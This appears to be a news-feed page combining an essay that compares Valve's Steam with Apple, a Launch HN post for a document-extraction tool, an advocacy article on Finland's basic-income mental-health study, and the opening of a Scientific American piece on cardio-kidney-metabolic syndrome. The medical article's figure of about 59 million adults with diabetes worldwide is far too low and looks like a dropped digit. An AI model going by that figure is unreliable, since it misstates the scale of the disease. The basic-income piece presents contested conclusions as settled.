We believe that 80 percent of the people stealing stuff don’t want to be; there’s just no legal alternative. So we said, Let’s create a legal alternative to this. Everybody wins. Music companies win. The artists win. Apple wins. And the user wins because he gets a better service and doesn’t have to be a thief.

( Esquire Magazine Interview, 2003 )

Newell:

“We think there is a fundamental misconception about piracy. Piracy is almost always a service problem and not a pricing problem,” [Newell] said. “If a pirate offers a product anywhere in the world, 24 x 7, purchasable from the convenience of your personal computer, and the legal provider says the product is region-locked, will come to your country 3 months after the US release, and can only be purchased at a brick and mortar store, then the pirate’s service is more valuable.”

(2011, proxied quote from The Cambridge Student via The Escapist ; the link in that article is dead, and a search on the site for “Newell” turns up no results)

This take by Newell is borne out by results, as he goes on to explain:

“Prior to entering the Russian market, we were told that Russia was a waste of time because everyone would pirate our products. Russia is now about to become [Steam’s] largest market in Europe,” Newell said.

While Jobs is providing an optimistic view on people’s morals and Newell is looking more clinically at overall value like an economist, they both point at the same underlying idea, i.e. “users will pay for a good experience”. We return again to Jobs’s famous refrain of “it just works” – and customers will pay you when it does.

When Steve Jobs died in 2011, people left flowers at Apple stores. When Gabe Newell so much as posts on Reddit, threads debating what happens to Steam without him rack up thousands of upvotes and comments. Both companies have fanbases that behave less like customers and more like congregations.

Even after almost 15 years of Tim Cook at its head, when you think “Apple”, you think of the iconic image of Steve Jobs looking directly at the camera with his hand on his chin that became the cover of Walter Isaacson’s biography . Jobs’s ideas around design as the lodestone of product development, his relentless focus on the customer experience, his love for simplicity – all of these are written into Apple’s very DNA and are the exact things customers love about their products.

While the general public might not recognize the name, Gabe Newell is the same in gaming circles. One need look no further than even reactions from those fans when Gabe Newell questions his own celebrity treatment. And just like Apple, this cult-like veneration extends to the company itself – despite having been almost 20 years since the last mainline entry in the Half-Life series, memes and (half-?)jokes about “Half-Life 3 when” have not died down, and when Valve announced a prequel VR game in the series due to release in 2020, the trailer racked up 10 million views in less than 24 hours … and, of course, prompted a fresh wave of “Half-Life 3 when?”

This phenomenon of fandom cannot be viewed as anything but a competitive advantage. Both companies have audiences that will literally hold off on buying things in case their “preferred” creator might enter the space, and watch their every move like hawks to determine what to “get hype” for.

Valve and Apple do differ in one major respect, however: Valve seems staunchly unwilling to pursue any explicit, strong lock-in.

Unlike Apple hardware, the Steam Deck does not need to be jailbroken in any way, and Valve explicitly provides a guide for how to go outside their ecosystem (and potentially brick your very expensive game machine). The messaging for the Steam Machine 2.0 seems equally “free”:

Yes, Steam Machine is optimized for gaming, but it’s still your PC. Install your own apps, or even another operating system. Who are we to tell you how to use your computer?

( Steam Machine product page )

A useful lens for understanding the dynamics at play when talking about Valve/Steam is that of Aggregation Theory.

Aggregation Theory is a model and way of thinking about businesses enabled by the Internet and digitization, conceived and coined by Ben Thompson of Stratechery. Thompson labels “Aggregators” as businesses having three core characteristics:

A Direct Relationship with Users
Negligible Marginal Cost for Additional Users
Demand-Driven Markets with Decreasing Acquisition Costs

Is that a mouthful? Yes, and the big words hide a lot of complexity. For those who want to really understand it (something I encourage, as I think that a lot of both the successes and failures in recent times of tech companies, whether in product strategy or regulation, come from a misunderstanding of these dynamics), I’d encourage going to the source and spidering out to related, mentioned articles (Thompson does such a great job at linking between his pieces that I’m tempted to provide a quasi-TVTropes warning first ):

However, for our purposes, I think we only need to engage with the concept at a high level.

Consider AirBnB (which might not initially seem like an aggregator), an example Thompson himself brings up often. Homesharing wasn’t a new concept that sprung fully-formed from Brian Chesky’s forehead; couchsurfers and foreign exchange students engaged in it for decades. What AirBnB did was aggregate demand – they made it trivially easy to find a nice place to stay. Once enough travelers were searching on AirBnB, hosts “had to be there”. Once enough hosts were listed, why would travelers look elsewhere? The platform became the default not by being the only option, but by being the most convenient .

In this regard, Steam works the same way.

Steam is inarguably an aggregator, and arguably close to the platonic ideal of one:

Direct Relationship with Users – As a customer, you make an account with Steam to activate products managed through it. While you don’t have to give them your payment information, it’s certainly more convenient to do so. It would almost require active commitment to avoid doing so: you’d have to exclusively buy game keys from other retailers, handle any and all in-game purchases directly with the game creators (if even possible), and deny yourself the ability to buy anything during the ever-rotating Steam Store sales that often feature deep discounts on a wide swath of games.
Negligible Marginal Cost for Additional Users – Steam is a digital storefront, so yes. Additional users are just an O(1) addition of rows in a few database tables. And while Steam obviously incurs some transaction costs when users buy things, who doesn’t pay the gatekeepers of Visa and Mastercard?
Demand-Driven with Decreasing Acquisition Costs – Steam is practically self-sustaining on both sides of its market. Customers not already on Steam are liable to wind up there by accident just buying a box copy of some game or another. That mass of users attracts developers, both small and large, even ones that left believing their fans would follow.

As a platform, Steam is also increasing lock-in:

SteamVR serves as the “platform” for VR development, driven by customer demand for Half-Life: Alyx, with the Steam Frame as the first-party platform (alongside already-existing VR hardware options like HTC Vive or Oculus Quest)
The Steam Deck functions as the “ iPhone for PC gaming ” (direct quote from GabeN)...
And now comes the Steam Machine to complete a “hardware trifecta” to mirror the iPad.

All of these hardware offerings are undergirded by the self-lock-in of users who have a significant portion (sometimes a supermajority) of their gaming libraries in Steam, which is (currently) non-transferable (c.f. iTunes/App Store/iCloud)

In this light, the parallels to Apple are hard not to see, but Apple “integrated forward” – they created great hardware that brought customers to them first, then slowly built the pretty walls around the garden users had entered, even as the garden itself expanded into new domains like mobile and watches.

Valve, by contrast “integrated backward” – they created the ecosystem first, offering both customers and developers amenities like managed updates, cloud saves, mod hosting, and content distribution networks before creating their own first-party hardware that leverages all that work.

A core contributor to the success of both Apple and Valve is that they both grew naturally (if in inverse directions):

Apple went from PCs, to laptops, to portable music, to smartphones as a generalization of their learnings from ‘portable music’, and finally to the modern ecosystem of software & peripherals (watches, headphones, VR).
Valve started in video games, then made a game launcher/update manager for their games, then offered that update management service to other developers with a storefront before finally getting to the hardware.

At each step, both companies responded to real market demand and simply did a better job at capturing that demand through UX. You can even see the proof by contradiction: The Steam Machine 1.0 shows where they perhaps moved too early or chased illusory demand, and a similar story may be repeating itself with Apple Vision.

It’s instructive to contrast this with Facebook’s “all-in” pivot to metaverse. At first blush, there are significant parallels to Valve, in that both Zuckerberg and Newell had built their fiefdoms in the lands of other empires and were trying to “escape their jailers”:

Newell was trying to get out of “Windows 8 jail” and the potential that Microsoft might smother their business with expansion of the Xbox business.
Zuckerberg wanted to leave the Apple/Google app platforms of iOS and Android, where their decisions around privacy could kneecap FB profits (ref: iOS’s App Tracking Transparency initiative), and run his own platform from which to derive value (or, being more cynical, collect rent).

However, it’s hard to imagine a bigger gap in outcomes between the two. Looking at the result of Facebook’s metaverse efforts in December 2025:

A stagnant Quest store/ecosystem

70 billion dollars in losses associated with the pivot
4 years invested for no meaningful revenue growth
Planned 10-30% cuts to Metaverse
- Perhaps most depressingly, investors drove stock 3-5% higher following release of news, indicating they were also fed up with this nonsense.

Why? Well, Zuckerberg’s big pivot was completely unbacked in demand, whether from customers or enterprises, to match the scale of the investment he decided to fling at it. Moreover, it had an at-best tenuous connection to the core competencies that Facebook had developed in scalable software, social networks, and advertising. Zuckerberg often talked about how everyone would interact with virtual avatars while on the go or in meetings across timezones or what have you, and how that tied into Facebook’s mission of connecting people, but as the saying goes: if you need to explain the joke, it isn’t funny.

All of this analysis begs the question: What sayeth the crystal balls?

If we’re looking at things as Aggregation Theorists, continued near-total monopoly is the obvious end result, absent significant developments:

What is important to note is that in all of these examples there are strong winner-take-all effects. All of the examples I listed are not only capable of serving all consumers/users, but they also become better services the more consumers/users they serve — and they are all capable of serving every consumer/user on earth.

( Aggregation Theory | Stratechery , 2015)

Competition is difficult once a big aggregator has emerged, even for deep-pocketed incumbents. One need only look at famous examples like Yahoo or Bing vs Google, or Walmart vs Amazon. Epic Games already tries to offer competition in digital storefronts by leveraging the breakout success of Fortnite to launch their Epic Games Store, with a more generous revenue split for developers and the backing of Tencent to buy up store exclusives (even if timed only) by flinging money around. However, 7 years into the experiment, these terms don’t seem to have resulted in any significant upturning of the apple cart.

Ben Thompson (of Stratechery) suggests that traditional platforms might offer an avenue by which competition can rise, looking at Shopify vis a vis Amazon . However, it’s unclear what “a platform approach” might look like as competition in the context of gaming here. Indeed, if you asked me what an extensible platform might look like in gaming, I’d say that Valve are, themselves, operating closer to a platform than a straightforward aggregator by making Proton/SteamOS free for other companies to use and potentially develop on top of (ref: Lenovo Legion Go S and ASUS ROG Ally as competitors to Steam Deck that can use Proton/SteamOS (though by default ship with Windows 11)).

So, if the traditional mechanisms of the market find no purchase, might we look elsewhere?

Antitrust is also hard, at least based on dominant US thought. Those who know me personally will know that I’ve long railed against Robert Bork’s consumer welfare standard for evaluating mergers and antitrust.

I’m hardly the first or alone in this – perhaps most notably, former FTC Chair and current Mamdani transition team member Lina Khan first made her name penning “ The Amazon Antitrust Paradox ” as a direct refutation of Bork’s ideas. However, despite some recent small shifts suggesting that the climate may be changing, it remains the default standard, and considering that users specifically choose to go to the aggregators due to the benefits they offer (whether on price or quality), consumer welfare seems unlikely to find any justification for action.

However, there are potential avenues in forced service interoperability and data portability. In short, the idea is that regulations can mandate that platforms of sufficient size have to allow other services to be able to integrate in some (perhaps standardized, limited) ways with the incumbent giants. This is an idea that’s already being trialed by the EU via the Digital Markets Act (DMA) for messaging (even despite some real and valid technical concerns ), and it’s also being partially (voluntarily, seemingly) rolled out in music streaming apps ( specifically between Apple Music and YouTube Music ). While it’s early days, if these initial forays work without significant snags, it may embolden other legislatures to make similar moves that ultimately wind up hitting Steam, forcing it to cooperate with EGS in some way like allowing Steam users to take their validly purchased games to EGS if they want.

Cory Doctorow’s pithy (if crude) term and model , which posits that platforms are eventually incentivized to ruin the experience for everyone on them in search of profit, might credibly be argued to be the end state of all platforms controlled by profit-seeking entities. And arguably, Steam has long since been “enshittified” in some regards. The deluge of games on the store that are approved for release without quality control has led to cheap, buggy messes or even outright malware finding their way onto customer machines. This is not a new problem, either, with industry analyst and pundit James Stephanie Sterling having coined the term “the asset flip” in 2015 to describe a problem that has only grown in scope since.

However, while that criticism might hold water for some industry professionals, power-users, and gaming enthusiasts who want to find “hidden gems”, for the average consumer, Steam generally remains a good experience for discovery, purchase, and library management.

Looking forward, as a private company that is majority owned by Gabe Newell himself, Valve is not as vulnerable to the kinds of short-term shareholder pressures that public companies or heavily venture-funded companies like Facebook/Bytedance face. While that alone is no guarantee, the combination of profitability, patient capital, and founder control may stave off the specter of enshittification for some time yet, at least while current leadership remains.

That is, however, also why, as mentioned earlier, many fans fret about what might happen to Steam and Valve in the absence of GabeN.

While it’s hard to say what direction technology might go in the future (who could’ve predicted in Oct 2022 that the US economy’s growth would hinge on LLMs?), there is one obvious avenue that may pose a threat: Cloud Gaming is only getting better.

Surfaces like Xbox Cloud Gaming or Nvidia GeForce Now are currently only either technological solutions that allow access to existing libraries (e.g. Steam or EGS via Nvidia GeForce Now) or Netflix-esque “subscription packages” for pre-selected games. However, there’s no technological reason preventing these providers from attempting to fight with Steam as a digital storefront; Google Stadia already tried this in a form, and while that service was eventually shut down, there’s nothing to suggest that the idea itself is inherently unworkable. If these services want to become “the Uber for gaming”, a storefront may eventually be a necessity; many of these services already have experimented with messaging of “pay-as-you-go” for gaming hardware, gesturing at a future where you never have to worry about hardware compatibility or drivers because it “runs in the cloud”, all of which is reminiscent of the “you won’t need to own a car, a self-driving one will just come pick you up” vision pitched by Uber or Tesla in years past.

If you were to ask me where things likely go from here, I’d say Valve will remain the much-beloved de facto king of PC gaming for the foreseeable future. This isn’t because they’re inherently more talented or virtuous, but because the factors for decay just aren’t there. They’re private, they’re profitable, and (if nothing else) they’re patient (Half-Life 3 when, GabeN?). There’s no strong incentive for them to enshittify.

The parallel to Apple isn’t perfect, though; the companies have taken different directions in some aspects. The more open approach Valve has taken with Proton and SteamOS is perhaps the most obvious, and I personally consider that to be a strength, especially in the context of regulation. However, there are other differences as well, and the one that stands out to me is in social infrastructure.

If I say “blue and green bubbles”, the direction I’m pointing at should become clear. Apple has leveraged their branding and dominant position (at least within the US) to elevate the iPhone to a status symbol, and in so doing has created network effects through iMessage and Facetime that further keeps their customers within their ecosystem in a way akin to traditional social networks (“I can’t leave Facebook; that’s how I keep in touch with my high school buddies!”). By contrast, while Steam does have chat and groups and forums and other social features, calling them “anemic” might be generous. When it comes to PC gaming, while most things make you think Valve and Steam, if you talk about social lock-in, it’s Discord that comes to mind, and that’s a chink in the fortress Valve has built.

The question is, will social infrastructure be as critical in gaming platform lock-in as it has been to mobile? If Apple’s trajectory is any guide – iMessage didn’t seem critical until it revealed itself as one of their strongest moats – owning the social layer may matter more than is obvious today.

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Beginning January 2026, all ACM publications will be made open access

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dl.acm.org

2025-12-18 15:39:09

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Launch HN: Pulse (YC S24) – Production-grade unstructured document extraction

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news.ycombinator.com

2025-12-18 15:35:52

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Hi HN, we’re Sid and Ritvik, co-founders of Pulse. Pulse is a document extraction system to create LLM-ready text. We built Pulse as we realized that although modern vision language models are very good at producing plausible text, that makes them risky for OCR and data ingestion at scale.

When we started working on document extraction, we assumed the same thing many teams do today: foundation models were improving quickly, multi modal systems appeared to read documents well, and for small or clean inputs that assumption often held. The limitations showed up once we began processing real documents in volume. Long PDFs, dense tables, mixed layouts, low-fidelity scans, and financial or operational data exposed errors that were subtle, hard to detect, and expensive to correct. Outputs often looked reasonable while containing small but meaningful mistakes, especially in tables and numeric fields.

A lot of our work since then has been applied research. We run controlled evaluations on complex documents, fine tune vision models, and build labeled datasets where ground truth actually matters. There have been many nights where our team stayed up hand annotating pages, drawing bounding boxes around tables, labeling charts point by point, or debating whether a number was unreadable or simply poorly scanned. That process shaped our intuition far more than benchmarks alone.

One thing became clear quickly. The core challenge was not extraction itself, but confidence. Vision language models embed document images into high-dimensional representations optimized for semantic understanding rather than precise transcription. That process is inherently lossy. When uncertainty appears, models tend to resolve it using learned priors instead of surfacing ambiguity. This behavior can be helpful in consumer settings. In production pipelines, it creates verification problems that do not scale well.

Pulse grew out of trying to address this gap through system design rather than prompting alone. Instead of treating document understanding as a single generative step, the system separates layout analysis from language modeling. Documents are normalized into structured representations that preserve hierarchy and tables before schema mapping occurs. Extraction is constrained by schemas defined ahead of time, and extracted values are tied back to source locations so uncertainty can be inspected rather than guessed away. In practice, this results in a hybrid approach that combines traditional computer vision techniques, layout models, and vision language models, because no single approach handled these cases reliably on its own.

We are intentionally sharing a few documents that reflect the types of inputs that motivated this work. These are representative of cases where we saw generic OCR or VLM-based pipelines struggle.

Here is a financial 10K: https://platform.runpulse.com/dashboard/examples/example1

Here is a newspaper: https://platform.runpulse.com/dashboard/examples/example2

Here is a rent roll: https://platform.runpulse.com/dashboard/examples/example3

Pulse is not perfect, particularly on highly degraded scans or uncommon handwriting, and there is still room for improvement. The goal is not to eliminate errors entirely, but to make them visible, auditable, and easier to reason about.

Pulse is available via usage-based access to the API and platform You can try it here and access the API docs here.

Demo link here: https://video.runpulse.com/video/pulse-platform-walkthrough-...

We’re interested in hearing how others here evaluate correctness for document extraction, which failure modes you have seen in practice, and what signals you rely on to decide whether an output can be trusted. We will be around to answer questions and are happy to run additional documents if people want to share examples.

Finland gave two groups identical payments – one saw better mental health

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scottsantens.substack.com

2025-12-18 15:34:11

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There’s a revolution happening in mental health treatment, and it’s not coming from pharmaceutical companies or therapy offices. It’s coming from something far simpler and, in retrospect, far more obvious: giving people monthly unconditional income.

A new analysis of Finland’s basic income experiment has just added another brick to what is becoming an undeniable wall of evidence . In the groundbreaking experiment, two groups of unemployed people received an identical amount of money with identical regularity—€560 per month. The only difference was how they received it. One group got it unconditionally, with no strings attached. The other group got it conditionally, with requirements to look for work, report to unemployment offices, and satisfy bureaucrats. And the money went away with employment.

Same money. Different rules. The results?

In the control group receiving conditional benefits at the end of the trial, 24% had poor mental health . In the treatment group receiving unconditional basic income, only 16% had poor mental health . That’s an 8 percentage point reduction—a full 33% less poor mental health —simply from removing the conditions.

Let that sink in. It wasn’t the amount of money that made the difference. Both groups got the same €560 a month. It was the unconditionality itself—the simple act of trusting people with resources, without surveillance or judgment, without hoops to jump through or forms to fill out—that created these dramatic improvements in psychological well-being.

This new analysis, published in December 2025 by researchers at the Max Planck Institute for Demographic Research and the University of Helsinki, confirms what basic income advocates have long suspected: the conditions we attach to welfare aren’t just bureaucratic inconveniences. They are active harms. They create stress, anxiety, and psychological damage that persists even when the financial support is adequate.

The Finnish experiment, launched in 2017, was a two-year nation-wide randomized field experiment on basic income. Two thousand randomly selected unemployed people received €560 per month with absolutely no conditions—no requirement to look for work, no reporting to unemployment offices, no penalties if they found employment or earned additional income. A control group of over 173,000 continued receiving traditional conditional unemployment benefits of the same amount.

Both groups got essentially the same money. The treatment group’s administrative burden was simply lower—they received their €560 without any conditionality whatsoever. That’s it. That’s really the only difference that was tested.

The researchers measured mental health using the MHI-5, a validated five-item mental health screening instrument that identifies people at risk of mood and anxiety disorders. What they found was striking: the treatment group was significantly less likely to screen positive for poor mental health. The adjusted risk difference was 8 percentage points, with a 95% confidence interval between 3 and 12 percentage points. In plain English, they’re confident unconditional basic income reduced poor mental health by somewhere between 12.5% and 50%, with their best guess being 33%. This wasn’t a fluke or statistical noise— this was a robust, significant finding .

The treatment group was more satisfied with their lives, experienced less mental strain, less depression, less sadness, and less loneliness. They reported better cognitive abilities—improved memory, learning, and concentration. All from receiving the same money with fewer strings attached.

This isn’t an isolated finding. It’s part of a pattern so consistent it should be making headlines everywhere.

Perhaps the most fascinating finding from Finland wasn’t about mental health at all—it was about trust. The basic income recipients trusted other people and institutions in society to a larger extent than the control group. They were more confident in their own future and their ability to influence things.

“The basic income recipients trusted other people and the institutions in society to a larger extent and were more confident in their own future and their ability to influence things than the control group. This may be due to the basic income being unconditional, which in previous studies has been seen to increase people’s trust in the system.” [ source ]

Evidence from Malawi reinforces this pattern. In a cash transfer experiment with adolescent schoolgirls, those who received unconditional payments were 14 percentage points less likely to suffer from psychological distress compared to the control group. Girls who received the same money but with conditions attached—requiring regular school attendance—showed only a 6 percentage point improvement. So here, unconditional cash was 2.3 times better for mental health than conditional cash—a 133% improvement . Researchers attributed the gap to the psychological burden of meeting conditions. Even well-intentioned requirements like education can undermine the mental health benefits that cash provides.

Think about what this means. When society trusts you with resources—when it says “here, we believe you can handle this without us watching over your shoulder”—you begin to trust society back. And when you trust the people and institutions around you, you feel better. Your mental health improves.

I know in my own life, I’m going to feel better mentally if I trust every member of society more. That trust isn’t just nice to have—it’s foundational to psychological well-being. It’s hard to feel good about the world when you feel surveilled, suspected, and constantly required to prove your worthiness. Unconditionality removes that burden, and the mental health benefits follow.

The researchers also investigated whether basic income helped some groups more than others. Using three different analytical methods—conventional subgroup analysis, multilevel modeling, and machine learning (causal forest)—they looked for variations across age, gender, education level, prior employment status, urbanicity, partnership status, and family composition.

What they found was remarkable: the beneficial effects were consistent across all groups . Basic income didn’t help young people more than old people, or women more than men, or the less educated more than the highly educated. It helped everyone roughly equally. As the researchers put it: “Our results suggest that basic income schemes have no harmful effects on mental health across multiple potential axes of labor market disadvantage, and are unlikely to increase mental health inequalities among people in unemployment.”

This matters enormously for policy. One concern about universal basic income is that it might help some people while harming others—that perhaps it would reinforce traditional gender roles or disadvantage certain groups. The Finnish data shows this isn’t the case. Basic income is a universally beneficial policy for mental health.

Finland’s findings align with research from around the world. In Kenya, researchers conducted a rigorous study comparing the effects of a $1,076 unconditional cash transfer against a five-week psychotherapy program that cost almost three times as much. One year later, the cash recipients showed higher levels of psychological well-being than the control group. The psychotherapy recipients? No measurable effects on either psychological or economic outcomes.

Perhaps most telling: combining both interventions—giving people both cash and therapy—produced results similar to cash alone. The therapy added nothing. The money was doing all the work.

This shouldn’t surprise us. When someone is drowning in financial stress and bureaucratic anxiety, cognitive behavioral therapy can only do so much. The therapy isn’t addressing the actual problem. Cash— unconditional cash—does.

Fresh results from Germany’s three-year basic income pilot, published in April 2025 , add even more weight to this evidence. Participants received €1,200 monthly for three years with no strings attached. The mental health improvements were, in the researchers’ words, “substantively large and robust.”

Mental health improved by 0.347 standard deviations. Sense of purpose in life improved by 0.250 standard deviations. Life satisfaction improved by 0.417 standard deviations. Expensive, intensive programs often produce effects of 0.1-0.2 SD. Getting 0.35-0.42 SD from “just” giving people money is remarkable. And the strongest effect was on autonomy—basic income gave people the feeling that they had more control over their lives, that their lives were “more valuable and meaningful.”

The German researchers concluded that basic income “functions as a resilience instrument.” It gives people the power to say no —to bad jobs, to exploitative conditions, to situations that harm their mental health. That power changes everything.

A systematic review published in Social Science & Medicine examined 38 studies of social security policy changes in high-income countries. Twenty-one studies looked at increases in social security generosity; seventeen looked at decreases. The pattern was unmistakable: policies that improve social security eligibility and generosity are associated with improvements in mental health . Policies that reduce eligibility and generosity are associated with worse mental health.

The evidence isn’t ambiguous. Give people more security, their mental health improves. Take security away, their mental health declines. The researchers also found that cuts to social security tend to increase mental health inequalities, while expansions have the opposite effect.

In Brazil, researchers studying the Bolsa Família program—covering half the Brazilian population over twelve years (over 114 million people)—found that cash transfer recipients had dramatically lower suicide rates : 5.5 per 100,000 compared to 11.1 per 100,000 among non-recipients. The monthly cash support was associated with approximately a 61% reduction in suicide risk . The effect was strongest among women (65% reduction) and individuals aged 25 to 59 (60% reduction).

We’re not talking about abstract well-being measures here. We’re talking about lives saved. These are thousands of real people who didn’t end their lives thanks to having cash support.

Some of the most compelling long-term evidence comes from North Carolina. In 1996, the Eastern Band of Cherokee Indians opened a casino and began distributing profits equally to all tribal members—a universal basic income for the community that continues to this day.

A Duke University study that was already tracking children’s mental health in the region suddenly became the longest-running observation of UBI’s effects. The results were remarkable: behavioral problems among children in families lifted out of poverty declined by 40% . Children who were youngest when payments began were a third less likely to develop substance abuse or psychiatric problems as teenagers. At ages 25 and 30, those who grew up with the basic income had a third of the anxiety and half the rates of depression compared to those who didn’t.

The casino dividends also improved the community’s social cohesion and self-determination. It wasn’t just individual mental health that improved—it was the fabric of the community itself. Economists have since tracked the costs of the annual dividend versus the savings in expenditures on crime and medical care. They find that by age 26, the benefits of the UBI exceeded its costs by a factor of three to one .

One of the most underappreciated findings from basic income research is how it strengthens community bonds —and how those stronger bonds contribute to better mental health. In the 150+ guaranteed basic income pilots conducted across the United States since 2020, researchers consistently find that participants use their time and resources to spend more time with friends, family, and neighbors.

In Namibia’s UBI pilot , researchers observed that “a stronger community spirit developed.” Begging had created barriers to normal social interaction—when everyone might ask you for money, you avoid social contact. Once basic income made begging unnecessary, people felt free to visit each other without being seen as wanting something in return. In India’s UBI pilot villages, traditionally separate castes began working together in ways that surprised even researchers.

We know from decades of research that social connection is the trump card for mental health. Basic income doesn’t just give people money—it gives them the time and security to invest in relationships. And those relationships support mental health in ways that compound over time.

Here’s where the mental health and social cohesion findings lead somewhere potentially unexpected: gun violence. The United States has one of the highest murder rates in the industrialized world—nearly three times more murders per capita than Canada and ten times more than Japan. What explains this (besides the guns)?

In 1998, Ichiro Kawachi at the Harvard School of Public Health led a landmark study investigating the factors driving American homicide rates. Using data from all 50 states measuring social capital (interpersonal trust that promotes cooperation), income inequality, poverty, unemployment, education levels, and alcohol consumption, the researchers identified which factors were most associated with violent crime.

The results were striking. Income inequality alone explained 74% of the variance in murder rates. But social capital had an even stronger association— by itself, it accounted for 82% of homicides . Other factors like unemployment, poverty, or education were only weakly associated. Social capital wasn’t just important—it was primary. As Kawachi concluded, when the ties that bind a community together are severed, inequality is allowed to run free, with deadly consequences.

What about guns themselves? In a follow-up study, Kawachi found that when social capital and community involvement declined, gun ownership increased. People who don’t trust their neighbors are more likely to think guns will provide security. In this way, both the number of guns and the number of homicides stem from the same root: eroded social capital. Address the root cause—rebuild trust and community bonds—and both problems may improve together.

This is where basic income enters the picture. Remember Finland’s finding: basic income recipients trusted other people and institutions more than the control group. Remember Namibia: a stronger community spirit developed. Remember India: castes began working together. Basic income doesn’t just improve individual mental health—it rebuilds the social fabric that protects communities from violence.

According to University of Washington sociologists (my alma mater), social activism—people working together for their community—is the single most important factor associated with reduced violence at the neighborhood, national, and individual levels. Universal basic income gives everyone the time and security to engage in exactly this kind of civic participation. It’s not just a mental health intervention. It’s a gun violence prevention intervention too.

The new Finland study makes something crystal clear that has been obscured for too long: the conditions we attach to welfare programs aren’t neutral features. They are active harms. The surveillance, the requirements, the constant need to prove worthiness—besides adding to administrative costs, these create psychological damage that persists even when the financial support is adequate.

We’ve spent decades debating how much money to give people, when we should have been asking whether we need to give it with so many strings attached. Finland gave both groups the same money. The group with fewer strings had 33% better mental health. That’s not a marginal improvement—that’s a transformation.

The evidence from Finland, Germany, Kenya, Brazil, North Carolina, Namibia, India, Canada, and dozens of American cities all points in the same direction: unconditional cash improves mental health. The unconditionality matters. The trust matters. Treating people like adults who can make their own decisions about their own lives —that matters.

The Canadian Mental Health Association has already officially endorsed basic income. So has the Canadian Medical Association. As the evidence continues to pile up, more health organizations will follow. The question is no longer whether basic income improves mental health—that question has been definitively answered. The question now is how long we’ll continue to ignore the answer.

Every day we delay implementing universal basic income, people suffer unnecessarily. They experience anxiety and depression that could be prevented. Their trust in society erodes, in turn eroding faith in democracy itself. Children grow up with chronic stress that shapes their brains and personalities in lasting ways. The science is in, and it’s unambiguous: universal basic income would be one of the most powerful mental health interventions humanity has ever devised .

Conditions are the problem. Trust is the solution. It’s time we started acting like it.

Note: This article discusses the mental health benefits of universal basic income based on multiple peer-reviewed studies and pilot programs. Individual experiences may vary, and basic income should be considered as one component of comprehensive mental health policy, not a replacement for necessary medical or psychological care.

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Another way to improve your mental health is to use your phone less…

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Heart and Kidney Diseases and Type 2 Diabetes May Be One Ailment

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www.scientificamerican.com

2025-12-18 15:23:05

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A my Bies was recovering in the hospital from injuries inflicted during a car accident in May 2007 when routine laboratory tests showed that her blood glucose and cholesterol were both dangerously high. Doctors ultimately sent her home with prescriptions for two standard drugs, metformin for what turned out to be type 2 diabetes and a statin to control her cholesterol levels and the heart disease risk they posed.

The combo, however, didn’t prevent a heart attack in 2013. And by 2019 she was on 12 different prescriptions to manage her continued high cholesterol and her diabetes and to reduce her heart risk. The resulting cocktail left her feeling so terrible that she considered going on medical leave from work. “I couldn’t even get through my day. I was so nauseated,” she said. “I would come out to my car in my lunch hour and pray that I could just not do this anymore.”

Medical researchers now think Bies’s conditions were not unfortunate co-occurrences. Rather they stem from the same biological mechanisms. The medical problem frequently begins in fat cells and ends in a dangerous cycle that damages seemingly unrelated organs and body systems: the heart and blood vessels, the kidneys, and insulin regulation and the pancreas. Harm to one organ creates ailments that assault the other two, prompting further illnesses that circle back to damage the original body part.

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Diseases of these three organs and systems are “tremendously interrelated,” says Chiadi Ndumele, a preventive cardiologist at Johns Hopkins University. The ties are so strong that in 2023 the American Heart Association grouped the conditions under one name: cardio-kidney-metabolic syndrome (CKM), with “metabolic syndrome” referring to diabetes and obesity.

The good news, says Ndumele, who led the heart association group that developed the CKM framework, is that CKM can be treated with new drugs. The wildly popular GLP-1 receptor agonists, such as Wegovy, Ozempic and Mounjaro , target common pathology underlying CKM. “The thing that has really moved the needle the most has been the advances in treatment,” says Sadiya Khan, a preventive cardiologist at Northwestern University. Although most of these drugs come only in injectable forms that can cost several hundred dollars a week, pill versions of some medications are up for approval, and people on Medicare could pay just $50 a month for them under a new White House pricing proposal. The appearance of these drugs on the scene is fortunate because researchers estimate that 90 percent of Americans have at least one risk factor for the syndrome.

More than a century before Bies entered the hospital, doctors had noticed that many of the conditions CKM syndrome comprises often occur together. They referred to the ensemble by terms such as “syndrome X.” People with diabetes, for instance, are two to four times more likely to develop heart disease than those without diabetes. Heart disease causes 40 to 50 percent of all deaths in people with advanced chronic kidney disease. And diabetes is one of the strongest risk factors for developing kidney conditions.

At present, around 59 million adults worldwide have diabetes, about 64 million are diagnosed with heart failure, and approximately 700 million live with chronic kidney disease.

The first inkling of a connection among these disparate conditions came as far back as 1923, when several lines of research started to spot links among high blood sugar, high blood pressure and high levels of uric acid—a sign of kidney disease and gout.

Then, several decades ago, researchers identified the first step in these tangled disease pathways: dysfunction in fat cells. Until the 1940s, scientists thought fat cells were simply a stash for excess energy. The 1994 discovery of leptin, a hormone secreted by fat cells, showed researchers a profound way that fat could communicate with and affect different body parts.

Since then, researchers have learned that certain kinds of fat cells release a medley of inflammatory and oxidative compounds that can damage the heart, kidneys, muscles, and other organs. The inflammation they cause impairs cells’ ability to respond to the pancreatic hormone insulin, which helps cells absorb sugars to fuel their activities. In addition to depriving cells of their primary energy source, insulin resistance causes glucose to build up in the blood—the telltale symptom of diabetes—further harming blood vessels and the organs they support. The compounds also reduce the ability of kidneys to filter toxins from the blood.

Playing cards featuring a heart illustration — Jennifer N. R. Smith

Insulin resistance and persistently high levels of glucose trigger a further cascade of events. Too much glucose harms mitochondria—tiny energy producers within cells—and nudges them to make unstable molecules known as reactive oxygen species that disrupt the functions of different enzymes and proteins. This process wrecks kidney and heart tissue, causing the heart to enlarge and blood vessels to become stiffer, impeding circulation and setting the stage for clots. Diabetes reduces levels of stem cells that help to fix this damage. High glucose levels also prod the kidneys to release more of the hormone renin, which sets off a hormonal cascade critical to controlling blood pressure and maintaining healthy electrolyte levels.

At the same time, cells that are resistant to insulin shift to digesting stored fats. This metabolic move releases other chemicals that cause lipid molecules such as cholesterol to clog blood vessels. The constriction leads to spikes in blood pressure and heightens a diabetic person’s risk of heart disease.

The circular connections wind even tighter. Just as diabetes can lead to heart and kidney conditions, illnesses of those organs can increase a person’s risk of developing diabetes. Disruption of the kidneys’ renin-angiotensin system—named for the hormones involved, which regulate blood pressure—also interferes with insulin signaling. Adrenomedullin, a hormone that increases during obesity, can also block insulin signaling in the cells that line blood vessels and the heart in humans and mice. Early signs of heart disease such as constricted blood vessels can exhaust kidney cells, which rely on a strong circulatory system to filter waste effectively.

The year before Bies’s car accident, when she was in her early 30s, her primary care doctor diagnosed her with prediabetes—part of metabolic syndrome—and recommended changes such as a healthier diet and more exercise. But at the time, the physician didn’t mention that this illness also increased her risk of heart disease.

